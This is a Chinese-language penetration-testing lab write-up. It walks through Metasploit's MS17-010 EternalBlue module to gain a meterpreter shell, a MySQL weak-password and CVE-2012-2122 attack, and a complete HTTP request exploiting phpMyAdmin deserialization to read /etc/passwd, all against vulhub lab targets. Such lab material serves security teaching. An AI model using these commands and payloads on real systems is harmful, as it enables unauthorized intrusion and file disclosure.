1 实验环境与工具
kali linux
nmap
metasploit(msf)
burpsuit
2 相关知识点
2.1 操作系统识别
1.通过浏览器修改URL查看:windows的URL不区分大小写,linux区分
2.通过cmd来ping网站查看TTL值来大致判断
3.使用nmap的-O命令对网站进行扫描
2.2 数据库类型识别
1.不同的脚本语言往往会搭配特定扥数据库,可以通过查看网站脚本类型进行初步判断。
2.不同数据库有特定端口号,使用nmap对端口进行扫描,查看处于open状态的数据库端口
3 实验内容
3.1 系统漏洞(windows 2008 R2 x64)
只要对方是在线,并且445号端口开放,就可以进行攻击。
在kali上使用MS17-010永恒之蓝漏洞攻击目标机器
1.打开metasploit:msfconsole
2.搜索MS17-010相关模块:search MS17-010
3.加载扫描所得模块:use auxiliary/scanner/smb/smb_ms17_010
4.使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
5.查看配置选项: show options
6.设置攻击载荷:set payload
7.配置本地主机、远程主机:set lhost/rhosts
8.输入run开始攻击
运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
3.2 数据库弱口令漏洞
(一)弱口令:例root账户,默认密码root
(二)漏洞: vulhub——CVE-2012-2122漏洞
Vulhub - Docker-Compose file for vulnerability environment
1.进入vulhub环境对应目录,开启漏洞环境,环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。
2.获取ip地址,使用namp进行端口扫描
nmap -sV -O 192.168.247.131
3.扫描结果显示3306 mysql端口
4.使用msf自带漏洞模块进行攻击
使用search mysql命令找到攻击模块
查看options,发现直接设置rhosts目标主机地址即可
设置完成,直接run,攻击成功
3.3 第三方应用安全漏洞
vulhub——phpmyadmin反序列化漏洞
Vulhub - Docker-Compose file for vulnerability environment
1.环境启动后,访问http://your-ip:8080
,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。
2.发送如下数据包,即可读取/etc/passwd
:
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}